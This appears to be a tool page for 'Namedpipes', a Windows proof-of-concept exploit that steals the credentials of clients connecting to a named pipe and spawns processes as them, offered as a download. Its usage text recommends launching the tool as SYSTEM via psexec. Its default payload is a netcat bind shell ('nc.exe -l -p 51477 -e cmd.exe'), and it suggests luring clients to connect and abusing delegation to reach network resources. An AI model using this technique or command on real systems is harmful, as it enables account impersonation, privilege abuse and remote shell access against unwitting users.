Namedpipes is a proof of concept tool that allows to impersonate remote clients, after their connect to a network pipe, and execute code with their own credentials.

If delegation is enable, the new shell can be used to access network resources. This is for example the default scenario on a fileserver that allows files to be ciphered.
This tool was originally released at the NoConName Security congress (Spanish paper)



Namedpipes waits for incomming connections. Once the client is connected a new shell can be executed. You can force clients to connect to the network pipe with payload generator tool.




Namedpipes calls the api CreateProcessAsUser() against an impersonated user token gathered with ImpersonateNamedPipeClient(). The privilege of the new shell depends of the domain delegation configuration. Delegation is not enable by default but network admins are not g00r00s.




You can browse online the source code.

Usage Information:

C:\Web\namedpipes>NamedPipe.exe /?
Impersonation attack Proof of concept Exploit
Author: Andres Tarasco ( atarasco_@_gmail_._com)
URL: http://www.tarasco.org/tools.html

Usage: 1st is recomended to execute a shell with NT AUTHORITY\SYSTEM privileges
Example: psexec.exe -i -s -c namedpipe.exe [parameters]

Parameters:
-e <command> Application to execute, default is "nc.exe -l -p 51477 -e cmd.exe"
-n <namedpipe> Named of the pipe. Default is "0day"
-r <network share> Fun with smbreplay




Download (Windows executable + Source code)